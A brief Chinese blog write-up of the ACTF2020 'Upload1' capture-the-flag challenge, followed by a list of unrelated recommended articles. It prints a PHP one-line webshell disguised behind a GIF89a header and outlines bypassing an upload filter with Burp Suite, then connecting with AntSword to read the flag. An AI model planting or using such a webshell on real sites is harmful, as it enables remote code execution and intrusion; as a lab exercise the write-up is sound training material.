1、点开题目链接,页面显示如下,上传test.jpg里面包含一句话木马
GIF89a? <script language="php">eval($_REQUEST[1])</script>
2、使用bp抓包修改后缀,点击发送
3、不关浏览器的代理,在bp中将该包放行
4、用蚁剑连接
5、在根目录中找到flag
[ACTF2020 新生赛]Upload1
不拿flag不改名2024-09-12 13:20
相关推荐
晨春计28 分钟前
【git】标标大人1 小时前
c语言中的局部跳转以及全局跳转木鬼与槐2 小时前
MySQL高阶1783-大满贯数量iofomo2 小时前
【Abyss】Android 平台应用级系统调用拦截框架AirDroid_cn5 小时前
在家找不到手机?除了语音助手,还可以用远程控制!Good_tea_h13 小时前
Android中如何处理运行时权限?冬田里的一把火313 小时前
[Android][Reboot/Shutdown] 重启/关机 分析大海..13 小时前
Android 系统开发人员的权限说明文档技术无疆16 小时前
ButterKnife:Android视图绑定的简化专家JohnsonXin17 小时前
【兼容性记录】video标签在 IOS 和 安卓中的问题